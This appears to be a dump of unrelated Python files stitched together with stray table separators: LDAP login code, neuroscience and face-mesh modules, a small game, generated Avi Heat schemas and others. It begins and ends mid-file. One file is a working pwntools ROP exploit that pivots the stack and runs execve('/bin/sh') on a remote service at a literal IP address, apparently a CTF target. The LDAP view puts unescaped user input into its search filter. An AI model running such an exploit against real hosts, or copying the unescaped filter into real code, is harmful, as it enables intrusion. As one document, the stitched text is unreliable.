    response = requests.post(auth_url, json=body).status_code
    # Guard clause replaces the original "pass / else raise" inversion.
    if response != 200:
        raise NameError("""
        The token you entered is not valid. Please make sure that its spelled
        correctly and try again. Contact someone for support if you get this
        more than once.
        """)

    print(f"""
    Welcome to the LINC Hackathon! Your token is now saved in the Console.
    That means you don't need to carry that out when using the other functions
    as long as you don't close your console.
    This function is only to be used once to authenticate your token.
    You can use the link below to view the dashboard:
    hackathon.linclund.com
    Happy coding!
    """)
| 1,940 | 531 |
"""
Module for loading BluePyOpt optimized model files
"""
import os
import sciunit
from neuronunit.capabilities import ReceivesSquareCurrent, ProducesMembranePotential, Runnable
from neuron import h
import neo
from quantities import ms
import zipfile
import json
import collections
class CellModel(sciunit.Model,
                ReceivesSquareCurrent,
                ProducesMembranePotential,
                Runnable):
    """Loads a BluePyOpt-optimized NEURON model from a directory and exposes
    it through the sciunit/neuronunit capability interfaces."""

    def __init__(self, model_path=None, model_name=None, run_alerts=False):
        """
        :param model_path: path to the model's directory.
        :param model_name: model name; defaults to the directory basename.
        :param run_alerts: if True, print progress every 100 ms of simulated time.
        :raises IOError: if model_path is not a directory or mod compilation fails.
        """
        # `model_path` is the path to the model's directory
        if not os.path.isdir(model_path):
            raise IOError("Invalid model path: {}".format(model_path))
        if not model_name:
            file_name = os.path.basename(model_path)
            model_name = file_name.split(".")[0]
        self.model_name = model_name
        self.base_path = model_path
        self.owd = os.getcwd()  # original working directory saved to return later
        self.run_alerts = run_alerts
        self.load_mod_files()
        self.load_cell_hoc()

        # get model template name
        # could also do this via other JSON, but morph.json seems dedicated for template info
        with open(os.path.join(self.base_path, "config", "morph.json")) as morph_file:
            model_template = list(json.load(morph_file, object_pairs_hook=collections.OrderedDict).keys())[0]

        # access model config info
        with open(os.path.join(self.base_path, "config", "parameters.json")) as params_file:
            params_data = json.load(params_file, object_pairs_hook=collections.OrderedDict)

        # extract v_init and celsius (if available)
        v_init = None
        celsius = None
        try:
            for item in params_data[model_template]["fixed"]["global"]:
                # would have been better if info was stored inside a dict (rather than a list)
                if "v_init" in item:
                    item.remove("v_init")
                    v_init = float(item[0])
                if "celsius" in item:
                    item.remove("celsius")
                    celsius = float(item[0])
        except Exception:
            # Bug fix: was a bare `except:` (also swallowed KeyboardInterrupt/
            # SystemExit). Best-effort parse — defaults are applied below.
            pass
        if v_init is None:
            h.v_init = -70.0
            print("Could not find model specific info for `v_init`; using default value of {} mV".format(str(h.v_init)))
        else:
            h.v_init = v_init
        if celsius is None:
            h.celsius = 34.0
            print("Could not find model specific info for `celsius`; using default value of {} degrees Celsius".format(str(h.celsius)))
        else:
            h.celsius = celsius

        # instantiate the cell template with its morphology directory
        self.cell = getattr(h, model_template)(os.path.join(str(self.base_path), "morphology"))
        self.iclamp = h.IClamp(0.5, sec=self.cell.soma[0])
        self.vm = h.Vector()
        self.vm.record(self.cell.soma[0](0.5)._ref_v)
        sciunit.Model.__init__(self, name=model_name)

    def load_mod_files(self):
        """Compile and load the model's NEURON mechanism (.mod) files.

        :raises IOError: if the compiled library is not produced.
        """
        os.chdir(self.base_path)
        libpath = "x86_64/.libs/libnrnmech.so.0"
        os.system("nrnivmodl mechanisms")  # do nrnivmodl in mechanisms directory
        if not os.path.isfile(os.path.join(self.base_path, libpath)):
            raise IOError("Error in compiling mod files!")
        h.nrn_load_dll(str(libpath))
        os.chdir(self.owd)

    def load_cell_hoc(self):
        """Locate and load the best cell .hoc file named in the model's meta JSON,
        falling back to any cell*.hoc under /checkpoints.

        :raises IOError: if no suitable .hoc file exists.
        """
        with open(os.path.join(self.base_path, self.model_name + '_meta.json')) as meta_file:
            meta_data = json.load(meta_file, object_pairs_hook=collections.OrderedDict)
        best_cell = meta_data["best_cell"]
        self.hocpath = os.path.join(self.base_path, "checkpoints", str(best_cell))

        if os.path.exists(self.hocpath):
            print("Model = {}: using (best cell) {}".format(self.model_name, best_cell))
        else:
            self.hocpath = None
            for filename in os.listdir(os.path.join(self.base_path, "checkpoints")):
                if filename.startswith("cell") and filename.endswith(".hoc"):
                    self.hocpath = os.path.join(self.base_path, "checkpoints", filename)
                    print("Model = {}: cell.hoc not found in /checkpoints; using {}".format(self.model_name, filename))
                    break
            if not os.path.exists(self.hocpath):
                raise IOError("No appropriate .hoc file found in /checkpoints")
        h.load_file(str(self.hocpath))

    def get_membrane_potential(self):
        """Must return a neo.AnalogSignal."""
        signal = neo.AnalogSignal(self.vm,
                                  units="mV",
                                  sampling_period=h.dt * ms)
        return signal

    def inject_current(self, current):
        """
        Injects somatic current into the model.

        Parameters
        ----------
        current : a dictionary like:
                        {'amplitude':-10.0*pq.pA,
                         'delay':100*pq.ms,
                         'duration':500*pq.ms}}
                  where 'pq' is the quantities package
        """
        self.iclamp.amp = current["amplitude"]
        self.iclamp.delay = current["delay"]
        self.iclamp.dur = current["duration"]

    def run(self, tstop):
        """Run the simulation until tstop (ms), recording Vm; optionally print
        progress every 100 ms when run_alerts is set."""
        t_alert = 100.0
        h.check_simulator()
        h.cvode.active(0)  # fixed-step integration
        self.vm.resize(0)  # clear any previous recording
        h.finitialize(h.v_init)
        while h.t < tstop:
            h.fadvance()
            if self.run_alerts and h.t > t_alert:
                print("\tTime: {} ms out of {} ms".format(t_alert, tstop))
                t_alert += 100.0
| 5,559 | 1,726 |
"""Invenio-LDAPClient login view."""
from __future__ import absolute_import, print_function
import uuid
from flask import Blueprint, after_this_request
from flask import current_app as app
from flask import flash, redirect, render_template, request
from flask_security import login_user
from invenio_accounts.models import User
from invenio_db import db
from invenio_userprofiles.models import UserProfile
from ldap3 import ALL, ALL_ATTRIBUTES, Connection, Server
from werkzeug.local import LocalProxy
from .forms import login_form_factory
# Lazy proxies: resolved per-request, so this module can be imported before
# the Flask-Security extension has been initialised on the app.
_security = LocalProxy(lambda: app.extensions['security'])
_datastore = LocalProxy(lambda: _security.datastore)

blueprint = Blueprint(
    'invenio_ldapclient',
    __name__,
    template_folder='templates',
    static_folder='static',
)
def _commit(response=None):
    """after_this_request hook: flush the datastore session, pass the response through."""
    _datastore.commit()
    return response
def _ldap_connection(form):
    """Make LDAP connection based on configuration.

    Returns False when the form is invalid or credentials are missing;
    otherwise an (unbound) ldap3 Connection — or whatever the configured
    custom connection factory returns.
    """
    if not form.validate_on_submit():
        return False
    form_pass = form.password.data
    form_user = form.username.data
    if not form_user or not form_pass:
        return False
    # Escape hatch: the app may supply its own connection factory.
    if app.config['LDAPCLIENT_CUSTOM_CONNECTION']:
        return app.config['LDAPCLIENT_CUSTOM_CONNECTION'](
            form_user, form_pass
        )
    ldap_server_kwargs = {
        'port': app.config['LDAPCLIENT_SERVER_PORT'],
        'get_info': ALL,
        'use_ssl': app.config['LDAPCLIENT_USE_SSL']
    }
    if app.config['LDAPCLIENT_TLS']:
        ldap_server_kwargs['tls'] = app.config['LDAPCLIENT_TLS']
    server = Server(
        app.config['LDAPCLIENT_SERVER_HOSTNAME'],
        **ldap_server_kwargs
    )
    # Bind DN of the form "<username_attr>=<user>,<bind_base>".
    ldap_user = "{}={},{}".format(
        app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'],
        form_user,
        app.config['LDAPCLIENT_BIND_BASE']
    )
    return Connection(server, ldap_user, form_pass)
def _search_ldap(connection, username):
    """Fetch the user entry from LDAP.

    Results are left on connection.entries; nothing is returned.
    """
    search_attribs = app.config['LDAPCLIENT_SEARCH_ATTRIBUTES']
    if search_attribs is None:
        # None means "fetch every attribute".
        search_attribs = ALL_ATTRIBUTES
    connection.search(
        app.config['LDAPCLIENT_SEARCH_BASE'],
        '({}={})'.format(
            app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'], username
        ),
        attributes=search_attribs)
def _register_or_update_user(entries, user_account=None):
    """Register a new user or update an existing one from LDAP *entries*.

    :param entries: ldap3 entry whose attributes provide email/username
        (and optionally full name).
    :param user_account: existing User to update, or None to create one.
    :return: the created or updated User.
    """
    email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
    username = entries[app.config['LDAPCLIENT_USERNAME_ATTRIBUTE']].values[0]
    # Bug fix: full_name was referenced unconditionally below but only
    # assigned when the config key was present, raising NameError otherwise.
    full_name = None
    if 'LDAPCLIENT_FULL_NAME_ATTRIBUTE' in app.config:
        full_name = entries[app.config[
            'LDAPCLIENT_FULL_NAME_ATTRIBUTE'
        ]].values[0]
    if user_account is None:
        kwargs = dict(email=email, active=True, password=uuid.uuid4().hex)
        _datastore.create_user(**kwargs)
        user_account = User.query.filter_by(email=email).one_or_none()
        profile = UserProfile(user_id=int(user_account.get_id()))
    else:
        user_account.email = email
        db.session.add(user_account)
        profile = user_account.profile
    if full_name is not None:
        profile.full_name = full_name
    profile.username = username
    db.session.add(profile)
    return user_account
def _find_or_register_user(connection, username):
    """Find user by email, username or register a new one.

    Returns None when the LDAP lookup yields nothing usable or the
    account is deactivated.
    """
    _search_ldap(connection, username)
    # Bug fix: connection.entries[0] was indexed before checking for
    # emptiness, raising IndexError when LDAP returned no results.
    if not connection.entries:
        return None
    entries = connection.entries[0]
    try:
        email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
    except IndexError:
        # Email is required
        return None
    # Try by username first
    user = User.query.join(UserProfile).filter(
        UserProfile.username == username
    ).one_or_none()
    # Try by email next
    if not user and app.config['LDAPCLIENT_FIND_BY_EMAIL']:
        user = User.query.filter_by(email=email).one_or_none()
    if user:
        if not user.active:
            return None
        return _register_or_update_user(entries, user_account=user)
    # Register new user
    if app.config['LDAPCLIENT_AUTO_REGISTRATION']:
        return _register_or_update_user(entries)
@blueprint.route('/ldap-login', methods=['GET', 'POST'])
def ldap_login():
    """
    LDAP login form view.

    Process login request using LDAP and register
    the user if needed.
    """
    form = login_form_factory(app)()
    if form.validate_on_submit():
        connection = _ldap_connection(form)
        if connection and connection.bind():
            after_this_request(_commit)
            user = _find_or_register_user(connection, form.username.data)
            if user and login_user(user, remember=False):
                next_page = request.args.get('next')
                # Only allow relative URLs for security. Security fix: also
                # reject protocol-relative '//host' targets, which browsers
                # treat as absolute (open-redirect vector).
                if not next_page or next_page.startswith(('http', '//')):
                    next_page = app.config['SECURITY_POST_LOGIN_VIEW']
                connection.unbind()
                db.session.commit()
                return redirect(next_page)
            else:
                connection.unbind()
                flash("We couldn't log you in, please contact your administrator.")  # noqa
        else:
            flash("We couldn't log you in, please check your password.")
    return render_template(
        app.config['SECURITY_LOGIN_USER_TEMPLATE'],
        login_user_form=form
    )
| 5,401 | 1,706 |
from random import randint
# Jogo de par ou ímpar: keeps playing until the computer wins once.
perder = ganhou = 0
print('\n=-=-=-=-TENTE GANHAR DE MIM NO PAR OU ÍMPAR!=-=-=-=-\n')
while True:
    print('-=' * 15)
    eu = int(input('Digite um número: '))
    pc = randint(1, 100)
    # (Removed unused par_ganhou/impar_ganhou counters.)
    i_p = ' '
    while i_p not in 'IP':
        # Bug fix: indexing [0] on an empty reply raised IndexError;
        # keep prompting until a non-empty answer is given.
        resposta = input('Você escolhe ímpar ou par? [I/P]: ').strip().upper()
        if resposta:
            i_p = resposta[0]
    soma = eu + pc
    print('-=' * 15)
    if i_p == 'P' and soma % 2 == 0:
        print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é PAR.')
        ganhou += 1
    elif i_p == 'I' and soma % 2 != 0:
        print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é ÍMPAR.')
        ganhou += 1
    else:
        # Computer wins: report parity and end the game below.
        x = 'PAR' if soma % 2 == 0 else 'ÍMPAR'
        print(f'O COMPUTADOR GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é {x}.')
        perder += 1
    if perder != 0:
        break
print('-' * 50)
print(f'Você PERDEU! Você conseguiu ganhar {ganhou} vezes consecutivamente!')
print('-' * 50)
| 1,125 | 490 |
from . import *
class UntrackSectionController(AppDevController):
    """Controller for POST /sections/untrack/: removes a tracked section for the
    authorized user and returns the section serialized for that user."""

    def get_path(self):
        # Route handled by this controller.
        return "/sections/untrack/"

    def get_methods(self):
        # Only POST is accepted.
        return ["POST"]

    @authorize_user
    def content(self, **kwargs):
        payload = request.get_json()
        current_user = kwargs.get("user")
        catalog_num = payload.get("course_id")
        if not catalog_num:
            raise Exception("Must provide catalog number.")
        untracked = users_dao.untrack_section(current_user.id, catalog_num)
        return untracked.serialize_with_user(current_user.id)
| 553 | 165 |
# -*- encoding: utf-8 -*-
#@File : stop.py
#@Time : 2021/12/23 16:21:37
#@Author : J0ins08
#@Software : Visual Studio Code
from aria2 import *
if __name__ == '__main__':
    # Clean up in the original order: aria2 state, downloaded files, torrents.
    for cleanup in (remove_aria2_file, remove_download_file, remove_torrent_file):
        cleanup()
from pwn import *
import time
context.arch = "amd64"

ip = "140.110.112.77"
port = 3122

r = remote(ip, port)
# r = process("./rop1")

# Gadget/data addresses — presumably taken from the static 'rop1' binary
# (names suggest their instruction sequences); TODO confirm against the
# actual target build.
data = 0x6ccd60              # writable address where stage-1 input is presumably stored
pop_rsi = 0x401637           # pop rsi ; ret (per the name)
pop_rax_rdx_rbx = 0x478616   # pop rax ; pop rdx ; pop rbx ; ret (per the name)
pop_rdi = 0x401516           # pop rdi ; ret (per the name)
syscall = 0x4672b5           # syscall instruction
leave = 0x4009e4             # leave ; ret — used below as a stack pivot

# Stage 1: chain setting rax=0x3b (execve on x86-64 Linux), rdx=0, rbx=0,
# rdi -> the '/bin/sh' bytes placed 10 qwords into the chain, rsi=0, then syscall.
r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))
# Stage 2: 32 filler bytes, then overwrite saved rbp with `data` and the
# return address with `leave` so rsp pivots onto the staged chain.
r.sendlineafter("=", b'a' * 32 + flat(data, leave))
r.interactive()
| 446 | 265 |
"""
Face Mesh Module
By : JikanDev
Website : https://jikandev.xyz/
"""
import cv2
import mediapipe as mp
class FaceMeshDetector():
    """
    Find 468 Landmarks using the mediapipe library. Exports the landmarks
    in pixel format.
    """

    def __init__(self, mode=False, maxFaces=1, refine_lm=False, minDetectCon=0.5, minTrackCon=0.5):
        """
        :param mode: In static mode, detection is done on each image: slower.
        :param maxFaces: Maximum number of faces to detect.
        :param refine_lm: Whether to further refine the landmark coordinates
        around the eyes and lips, and output additional landmarks around the
        irises.
        :param minDetectCon: Minimum Detection Confidence Threshold.
        :param minTrackCon: Minimum Tracking Confidence Threshold.
        """
        self.mode = mode
        self.maxFaces = maxFaces
        self.refine_lm = refine_lm
        self.minDetectCon = minDetectCon
        self.minTrackCon = minTrackCon

        self.mpDraw = mp.solutions.drawing_utils
        self.mpDrawingStyles = mp.solutions.drawing_styles
        self.faceMesh = mp.solutions.face_mesh
        # Args passed positionally — assumed to match mediapipe's FaceMesh
        # parameter order; TODO confirm against the installed version.
        self.meshDetection = self.faceMesh.FaceMesh(mode, maxFaces, refine_lm, minDetectCon, minTrackCon)

    def findFaces(self, img, draw=True, drawTesselation=True):
        """
        Find faces in an image and return the landmark info.

        :param img: Image to find the faces in (BGR, as from cv2).
        :param draw: Flag to draw the output contours of the mesh on the image.
        :param drawTesselation: Flag to draw the output tesselation of the mesh on the image.
        :return: (allFaces, img) — a list of dicts with key "lmList" holding
        [x, y] pixel coordinates per landmark, and the (possibly annotated) image.
        """
        # mediapipe expects RGB input.
        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        # Last raw result kept on the instance for callers that want it.
        self.results = self.meshDetection.process(imgRGB)
        allFaces = []
        h, w, c = img.shape
        if self.results.multi_face_landmarks:
            for faceLms in self.results.multi_face_landmarks:
                myMesh = {}
                mylmList = []
                # Landmarks come back normalised [0, 1]; convert to pixels.
                for id, lm in enumerate(faceLms.landmark):
                    px, py = int(lm.x * w), int(lm.y * h)
                    mylmList.append([px, py])

                myMesh["lmList"] = mylmList
                if draw:
                    self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_CONTOURS, None)
                    if drawTesselation:
                        self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_TESSELATION, None,
                                                   self.mpDrawingStyles.get_default_face_mesh_tesselation_style())
                allFaces.append(myMesh)
        return allFaces, img
def main():
    """
    Example code to use the module.

    Opens the default camera and draws the face mesh until 'q' is pressed
    or the camera stops delivering frames.
    """
    cap = cv2.VideoCapture(0)  # Get your camera
    detector = FaceMeshDetector()  # Call the FaceMeshDetector class
    while True:
        success, img = cap.read()  # If success, img = read your camera image
        if not success:
            # Robustness fix: stop instead of processing a failed read.
            break
        meshes, img = detector.findFaces(img)
        if meshes:
            # Mesh 1
            mesh1 = meshes[0]
            lmList1 = mesh1["lmList"]  # List of 468 landmark points (the face mesh has 468, not 21)
            if len(meshes) == 2:
                # Mesh 2
                mesh2 = meshes[1]
                lmList2 = mesh2["lmList"]  # List of 468 landmark points
        cv2.imshow("Face Mesh Module", img)
        # Bug fix: the original loop had no exit condition; quit on 'q'.
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    # Release the camera and close the window on exit.
    cap.release()
    cv2.destroyAllWindows()
# GENERATED FILE - DO NOT EDIT THIS FILE UNLESS YOU ARE A WIZZARD
#pylint: skip-file
from heat.engine import properties
from heat.engine import constraints
from heat.engine import attributes
from heat.common.i18n import _
from avi.heat.avi_resource import AviResource
from avi.heat.avi_resource import AviNestedResource
from options import *
from common import *
from options import *
from rate import *
from match import *
class FailActionHTTPLocalResponse(object):
    """Generated Avi schema: serve a local HTTP response (status code + file)
    as a pool fail action. Do not hand-edit (generated file)."""
    # all schemas
    status_code_schema = properties.Schema(
        properties.Schema.STRING,
        _(" (Default: FAIL_HTTP_STATUS_CODE_503)"),
        required=False,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['FAIL_HTTP_STATUS_CODE_200', 'FAIL_HTTP_STATUS_CODE_503']),
        ],
    )
    file_schema = properties.Schema(
        properties.Schema.MAP,
        _(""),
        schema=HTTPLocalFile.properties_schema,
        required=False,
        update_allowed=True,
    )

    # properties list
    PROPERTIES = (
        'status_code',
        'file',
    )

    # mapping of properties to their schemas
    properties_schema = {
        'status_code': status_code_schema,
        'file': file_schema,
    }

    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'file': getattr(HTTPLocalFile, 'field_references', {}),
    }

    unique_keys = {
        'file': getattr(HTTPLocalFile, 'unique_keys', {}),
    }
class PriorityLabels(AviResource):
    """Generated Avi resource schema: a named, ordered set of equivalent
    priority labels. Do not hand-edit (generated file)."""
    resource_name = "prioritylabels"
    # all schemas
    avi_version_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
        required=False,
        update_allowed=True,
    )
    name_schema = properties.Schema(
        properties.Schema.STRING,
        _("The name of the priority labels."),
        required=True,
        update_allowed=True,
    )
    equivalent_labels_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("Equivalent priority labels in descending order."),
        schema=EquivalentLabels.properties_schema,
        required=True,
        update_allowed=False,
    )
    equivalent_labels_schema = properties.Schema(
        properties.Schema.LIST,
        _("Equivalent priority labels in descending order."),
        schema=equivalent_labels_item_schema,
        required=False,
        update_allowed=True,
    )
    description_schema = properties.Schema(
        properties.Schema.STRING,
        _("A description of the priority labels."),
        required=False,
        update_allowed=True,
    )
    cloud_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        required=False,
        update_allowed=False,
    )

    # properties list
    PROPERTIES = (
        'avi_version',
        'name',
        'equivalent_labels',
        'description',
        'cloud_uuid',
    )

    # mapping of properties to their schemas
    properties_schema = {
        'avi_version': avi_version_schema,
        'name': name_schema,
        'equivalent_labels': equivalent_labels_schema,
        'description': description_schema,
        'cloud_uuid': cloud_uuid_schema,
    }

    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'equivalent_labels': getattr(EquivalentLabels, 'field_references', {}),
    }

    unique_keys = {
        'equivalent_labels': getattr(EquivalentLabels, 'unique_keys', {}),
    }
class PoolGroupMember(object):
    """Generated Avi schema: one member pool of a pool group (uuid, ratio,
    priority label, deployment state). Do not hand-edit (generated file)."""
    # all schemas
    pool_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("UUID of the pool You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=True,
        update_allowed=True,
    )
    ratio_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Ratio of selecting eligible pools in the pool group. (Default: 1)"),
        required=False,
        update_allowed=True,
    )
    priority_label_schema = properties.Schema(
        properties.Schema.STRING,
        _("All pools with same label are treated similarly in a pool group. A pool with a higher priority is selected, as long as the pool is eligible or an explicit policy chooses a different pool."),
        required=False,
        update_allowed=True,
    )
    deployment_state_schema = properties.Schema(
        properties.Schema.STRING,
        _("Pool deployment state used with the PG deployment policy"),
        required=False,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['EVALUATION_FAILED', 'EVALUATION_IN_PROGRESS', 'IN_SERVICE', 'OUT_OF_SERVICE']),
        ],
    )

    # properties list
    PROPERTIES = (
        'pool_uuid',
        'ratio',
        'priority_label',
        'deployment_state',
    )

    # mapping of properties to their schemas
    properties_schema = {
        'pool_uuid': pool_uuid_schema,
        'ratio': ratio_schema,
        'priority_label': priority_label_schema,
        'deployment_state': deployment_state_schema,
    }

    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'pool_uuid': 'pool',
    }

    unique_keys = {
        'my_key': 'pool_uuid,priority_label',
    }
class AbPool(object):
    """Generated Avi schema: B pool plus traffic ratio for A/B testing.
    Do not hand-edit (generated file)."""
    # all schemas
    pool_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Pool configured as B pool for A/B testing You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=True,
        update_allowed=True,
    )
    ratio_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Ratio of traffic diverted to the B pool, for A/B testing (Default: 0)"),
        required=False,
        update_allowed=True,
    )

    # properties list
    PROPERTIES = (
        'pool_uuid',
        'ratio',
    )

    # mapping of properties to their schemas
    properties_schema = {
        'pool_uuid': pool_uuid_schema,
        'ratio': ratio_schema,
    }

    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'pool_uuid': 'pool',
    }
class FailActionBackupPool(object):
    """Generated Avi schema: backup pool to use as a pool fail action.
    Do not hand-edit (generated file)."""
    # all schemas
    backup_pool_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Specifies the UUID of the Pool acting as backup pool. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=True,
        update_allowed=True,
    )

    # properties list
    PROPERTIES = (
        'backup_pool_uuid',
    )

    # mapping of properties to their schemas
    properties_schema = {
        'backup_pool_uuid': backup_pool_uuid_schema,
    }

    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'backup_pool_uuid': 'pool',
    }
class FailActionHTTPRedirect(object):
    """Schema container for the FailActionHTTPRedirect Avi object.

    Describes the HTTP redirect returned to clients when a pool failure
    occurs.
    """

    # Schema for the redirect protocol (HTTP or HTTPS).
    protocol_schema = properties.Schema(
        properties.Schema.STRING,
        _(" (Default: HTTPS)"),
        update_allowed=True,
        required=False,
        constraints=[
            constraints.AllowedValues(['HTTP', 'HTTPS']),
        ],
    )
    # Schema for the redirect target host (the only required field).
    host_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        update_allowed=True,
        required=True,
    )
    # Schema for the redirect path.
    path_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        update_allowed=True,
        required=False,
    )
    # Schema for the redirect query string.
    query_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        update_allowed=True,
        required=False,
    )
    # Schema for the HTTP status code used for the redirect.
    status_code_schema = properties.Schema(
        properties.Schema.STRING,
        _(" (Default: HTTP_REDIRECT_STATUS_CODE_302)"),
        update_allowed=True,
        required=False,
        constraints=[
            constraints.AllowedValues(['HTTP_REDIRECT_STATUS_CODE_301', 'HTTP_REDIRECT_STATUS_CODE_302', 'HTTP_REDIRECT_STATUS_CODE_307']),
        ],
    )

    # Ordered tuple of property names exposed by this object.
    PROPERTIES = ('protocol', 'host', 'path', 'query', 'status_code')

    # Property name -> schema mapping consumed by Heat.
    properties_schema = {
        'protocol': protocol_schema,
        'host': host_schema,
        'path': path_schema,
        'query': query_schema,
        'status_code': status_code_schema,
    }
class PGDeploymentRule(object):
    """Schema container for the PGDeploymentRule Avi object.

    One evaluation rule (metric, comparison operator, optional threshold)
    used by the pool group deployment policy.
    """

    # Schema for the metric identifier to evaluate.
    metric_id_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        update_allowed=True,
        required=False,
    )
    # Schema for the comparison operator applied to the metric.
    operator_schema = properties.Schema(
        properties.Schema.STRING,
        _(" (Default: CO_GE)"),
        update_allowed=True,
        required=False,
        constraints=[
            constraints.AllowedValues(['CO_EQ', 'CO_GE', 'CO_GT', 'CO_LE', 'CO_LT', 'CO_NE']),
        ],
    )
    # Schema for the optional pass/fail threshold value.
    threshold_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("metric threshold that is used as the pass fail. If it is not provided then it will simply compare it with current pool vs new pool"),
        update_allowed=True,
        required=False,
    )

    # Ordered tuple of property names exposed by this object.
    PROPERTIES = ('metric_id', 'operator', 'threshold')

    # Property name -> schema mapping consumed by Heat.
    properties_schema = {
        'metric_id': metric_id_schema,
        'operator': operator_schema,
        'threshold': threshold_schema,
    }
class DiscoveredNetwork(object):
    """Schema container for the DiscoveredNetwork Avi object.

    Holds the Heat property schemas describing a network discovered for an
    IP, together with its discovered IPv4 ('subnet') and IPv6 ('subnet6')
    subnets.
    """
    # all schemas
    network_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Discovered network for this IP. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=True,
        update_allowed=True,
    )
    # Element schema for entries of the 'subnet' list below.
    subnet_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("Discovered subnet for this IP."),
        schema=IpAddrPrefix.properties_schema,
        required=True,
        update_allowed=False,
    )
    subnet_schema = properties.Schema(
        properties.Schema.LIST,
        _("Discovered subnet for this IP."),
        schema=subnet_item_schema,
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'subnet6' list below.
    subnet6_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("(Introduced in: 18.1.1) Discovered IPv6 subnet for this IP."),
        schema=IpAddrPrefix.properties_schema,
        required=True,
        update_allowed=False,
    )
    subnet6_schema = properties.Schema(
        properties.Schema.LIST,
        _("(Introduced in: 18.1.1) Discovered IPv6 subnet for this IP."),
        schema=subnet6_item_schema,
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = (
        'network_uuid',
        'subnet',
        'subnet6',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'network_uuid': network_uuid_schema,
        'subnet': subnet_schema,
        'subnet6': subnet6_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'subnet': getattr(IpAddrPrefix, 'field_references', {}),
        'subnet6': getattr(IpAddrPrefix, 'field_references', {}),
        'network_uuid': 'network',
    }
    # NOTE(review): presumably uniqueness keys for nested list members,
    # mirroring the other generated classes — confirm with the generator.
    unique_keys = {
        'subnet': getattr(IpAddrPrefix, 'unique_keys', {}),
        'subnet6': getattr(IpAddrPrefix, 'unique_keys', {}),
    }
class FailAction(object):
    """Schema container for the FailAction Avi object.

    Configures the response sent to clients when a pool fails: close the
    TCP connection (default), an HTTP redirect, a local HTTP response, or
    a (deprecated) backup pool.
    """
    # all schemas
    type_schema = properties.Schema(
        properties.Schema.STRING,
        _("Enables a response to client when pool experiences a failure. By default TCP connection is closed. (Default: FAIL_ACTION_CLOSE_CONN)"),
        required=True,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['FAIL_ACTION_BACKUP_POOL', 'FAIL_ACTION_CLOSE_CONN', 'FAIL_ACTION_HTTP_LOCAL_RSP', 'FAIL_ACTION_HTTP_REDIRECT']),
        ],
    )
    redirect_schema = properties.Schema(
        properties.Schema.MAP,
        _("URL to redirect HTTP requests to when pool experiences a failure"),
        schema=FailActionHTTPRedirect.properties_schema,
        required=False,
        update_allowed=True,
    )
    local_rsp_schema = properties.Schema(
        properties.Schema.MAP,
        _("Local response to HTTP requests when pool experiences a failure"),
        schema=FailActionHTTPLocalResponse.properties_schema,
        required=False,
        update_allowed=True,
    )
    backup_pool_schema = properties.Schema(
        properties.Schema.MAP,
        _("(Deprecated in: 18.1.2) Backup Pool when pool experiences a failure"),
        schema=FailActionBackupPool.properties_schema,
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = (
        'type',
        'redirect',
        'local_rsp',
        'backup_pool',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'type': type_schema,
        'redirect': redirect_schema,
        'local_rsp': local_rsp_schema,
        'backup_pool': backup_pool_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'redirect': getattr(FailActionHTTPRedirect, 'field_references', {}),
        'backup_pool': getattr(FailActionBackupPool, 'field_references', {}),
        'local_rsp': getattr(FailActionHTTPLocalResponse, 'field_references', {}),
    }
    # uniqueness keys inherited from the nested sub-object schemas
    unique_keys = {
        'redirect': getattr(FailActionHTTPRedirect, 'unique_keys', {}),
